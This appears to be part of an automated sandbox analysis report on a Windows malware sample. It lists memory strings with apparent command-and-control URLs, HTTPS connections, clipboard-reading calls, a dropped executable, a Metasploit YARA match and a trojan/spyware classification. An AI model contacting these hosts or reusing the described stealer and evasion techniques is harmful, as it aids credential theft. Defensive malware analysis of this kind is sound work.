                    Source: 7.exe, 00000008.00000000.2544090766.00007FF78BD17000.00000008.00000001.01000000.00000009.sdmp, 7.exe, 00000008.00000002.2710351755.00007FF78BD20000.00000008.00000001.01000000.00000009.sdmp, 7.exe.0.drString found in binary or memory: https://github.com/gabomdq/SDL_GameControllerDB
                    Source: BitLockerToGo.exe, 00000009.00000003.2749860293.00000000057CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbmfQq%2B4pbW4pbWfpbX7ReNxR3UIG8zInwYIFIVs9e
                    Source: BitLockerToGo.exe, 00000009.00000003.2726008085.00000000057E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.co/1lLu
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578365663.0000000001041000.00000004.00000020.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.co/1lLub
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.co/1lLubE%
                    Source: BitLockerToGo.exe, 00000009.00000003.2726125579.00000000057B1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2726008085.00000000057DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.co/https://iplogger.co/1lLubiplogger.co/1lLub
                    Source: BitLockerToGo.exe, 00000009.00000003.2806622560.0000000003494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/
                    Source: BitLockerToGo.exe, 00000009.00000003.2725717754.00000000034A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/(
                    Source: BitLockerToGo.exe, 00000009.00000003.2818351872.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820293806.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2819099285.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2806622560.0000000003494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/D
                    Source: BitLockerToGo.exe, 00000009.00000003.2818351872.000000000345C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820172049.000000000345C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/H
                    Source: BitLockerToGo.exe, 00000009.00000003.2760836658.0000000003494000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2806548814.00000000034E7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2819494915.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2806622560.0000000003494000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820525655.00000000034EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/api
                    Source: BitLockerToGo.exe, 00000009.00000003.2819494915.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820525655.00000000034EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/api1
                    Source: BitLockerToGo.exe, 00000009.00000003.2818351872.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820293806.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2819099285.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2806622560.0000000003494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/api2
                    Source: BitLockerToGo.exe, 00000009.00000003.2806849532.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2787269781.00000000034E7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2806548814.00000000034E7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2819494915.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820525655.00000000034EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/apiD
                    Source: BitLockerToGo.exe, 00000009.00000003.2760301734.00000000057DB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2760595470.00000000057DB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2725717754.00000000034A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/apiK
                    Source: BitLockerToGo.exe, 00000009.00000003.2725717754.00000000034A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/apiM
                    Source: BitLockerToGo.exe, 00000009.00000003.2747924096.00000000057D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/apiWV
                    Source: BitLockerToGo.exe, 00000009.00000003.2818351872.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820293806.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2819099285.00000000034A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/apib
                    Source: BitLockerToGo.exe, 00000009.00000003.2819494915.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820525655.00000000034EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/apie
                    Source: BitLockerToGo.exe, 00000009.00000003.2806849532.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2787269781.00000000034E7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2806548814.00000000034E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/apii
                    Source: BitLockerToGo.exe, 00000009.00000003.2737314312.00000000034E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/apir
                    Source: BitLockerToGo.exe, 00000009.00000003.2737314312.00000000034E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/apir&
                    Source: BitLockerToGo.exe, 00000009.00000003.2764259056.0000000003494000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2760836658.0000000003494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/crosofb
                    Source: BitLockerToGo.exe, 00000009.00000003.2818351872.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820293806.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2819099285.00000000034A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/ll
                    Source: BitLockerToGo.exe, 00000009.00000003.2818351872.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820293806.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2819099285.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2806622560.0000000003494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/lz
                    Source: BitLockerToGo.exe, 00000009.00000003.2725717754.00000000034A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/x
                    Source: BitLockerToGo.exe, 00000009.00000003.2819336501.000000000346E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2806685406.000000000346E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820199183.000000000346E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2725717754.0000000003483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop:443/api
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.000000000308E000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000030AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.000000000308E000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000030AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                    Source: BitLockerToGo.exe, 00000009.00000003.2749499865.00000000058BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: BitLockerToGo.exe, 00000009.00000003.2749499865.00000000058BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.000000000308E000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000030AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                    Source: BitLockerToGo.exe, 00000009.00000003.2749860293.00000000057CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_cd61a4703a8613be887576f2bd084bcc6f4756dccdbe5062
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.000000000339A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2726583826.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2726391359.00000000057DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.000000000339A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2726583826.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2726391359.00000000057DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: BitLockerToGo.exe, 00000009.00000003.2749860293.00000000057CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                    Source: BitLockerToGo.exe, 00000009.00000003.2749448147.00000000057E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                    Source: BitLockerToGo.exe, 00000009.00000003.2749499865.00000000058BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.5iSPD7jwkDnW
                    Source: BitLockerToGo.exe, 00000009.00000003.2749499865.00000000058BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.3UfcDFx2ZSAZ
                    Source: BitLockerToGo.exe, 00000009.00000003.2749499865.00000000058BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: BitLockerToGo.exe, 00000009.00000003.2749499865.00000000058BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.12:49709 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.12:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.12:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.216.42.97:443 -> 192.168.2.12:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.12:49720 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.12:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.12:49734 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.12:49735 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49736 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49738 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49739 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49740 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49741 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49742 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49745 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.12:49746 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.12:49747 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.12:49752 version: TLS 1.2
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_03230030 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_03230030
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_03230030 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_03230030
                    Source: 7.exeBinary or memory string: procDirectInput8Create
                    Source: 7.exeBinary or memory string: qdestination-outwglGetCurrentDCDragAcceptFilesCreateWindowExWGetActiveWindowGetDpiForWindowGetRawInputDataTrackMouseEventWindowFromPointGetThreadContextSetThreadContext0123456789abcdef: value of type time: bad [0-9]*DuplicateTokenExOpenProcessTokenRegQueryInfo

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 00000008.00000002.2708226918.000000C0008D8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_00F7DC740_2_00F7DC74
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_051C8D280_2_051C8D28
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_051C69480_2_051C6948
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_051C00060_2_051C0006
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_051C00400_2_051C0040
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_051C8D180_2_051C8D18
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_0637ACE80_2_0637ACE8
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_0637CD780_2_0637CD78
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_0637DAD80_2_0637DAD8
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_063770A00_2_063770A0
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_06373E380_2_06373E38
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_06373E480_2_06373E48
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_06377A700_2_06377A70
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_06378AD80_2_06378AD8
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_063759680_2_06375968
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_063795480_2_06379548
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_032183499_2_03218349
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_032226F09_2_032226F0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_032234B09_2_032234B0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_03235E209_2_03235E20
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_03204E309_2_03204E30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_03220E989_2_03220E98
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_03221C999_2_03221C99
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_032082809_2_03208280
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_0321C1109_2_0321C110
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_032101709_2_03210170
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_032241489_2_03224148
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_0323C0209_2_0323C020
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_0322901A9_2_0322901A
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_0323D7109_2_0323D710
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_032066B09_2_032066B0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_032385809_2_03238580
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_032044309_2_03204430
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_0323D4009_2_0323D400
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_032354609_2_03235460
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_03226B709_2_03226B70
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_0323BB509_2_0323BB50
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_03206BE09_2_03206BE0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_03203A309_2_03203A30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_03223AD99_2_03223AD9
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_032059409_2_03205940
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_0322D98C9_2_0322D98C
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_0322AFE89_2_0322AFE8
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_03201EF09_2_03201EF0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_03222EF09_2_03222EF0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_03208ED09_2_03208ED0
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7.exe 842E6467D3F6BDDB484929A8DBA9757920E0B484D8ADDF40A8FE69F8B205F174
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 03209450 appears 168 times
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 03208CB0 appears 45 times
                    Source: 7.exe.0.drStatic PE information: Number of sections : 12 > 10
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefirefox.exe0 vs dlcdkJcbbV.exe
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\000004B0\\OriginalFilename vs dlcdkJcbbV.exe
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs dlcdkJcbbV.exe
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs dlcdkJcbbV.exe
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs dlcdkJcbbV.exe
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXED vs dlcdkJcbbV.exe
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\080904B0\\OriginalFilename vs dlcdkJcbbV.exe
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs dlcdkJcbbV.exe
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578365663.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs dlcdkJcbbV.exe
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs dlcdkJcbbV.exe
                    Source: dlcdkJcbbV.exe, 00000000.00000000.2304114154.0000000000914000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCausality.exe8 vs dlcdkJcbbV.exe
                    Source: dlcdkJcbbV.exeBinary or memory string: OriginalFilenameCausality.exe8 vs dlcdkJcbbV.exe
                    Source: dlcdkJcbbV.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000008.00000002.2708226918.000000C0008D8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/10@12/10
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_0322F96C CoCreateInstance,9_2_0322F96C
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile created: C:\Users\user\AppData\Local\SystemCacheJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile created: C:\Users\user\AppData\Local\Temp\7.exeJump to behavior
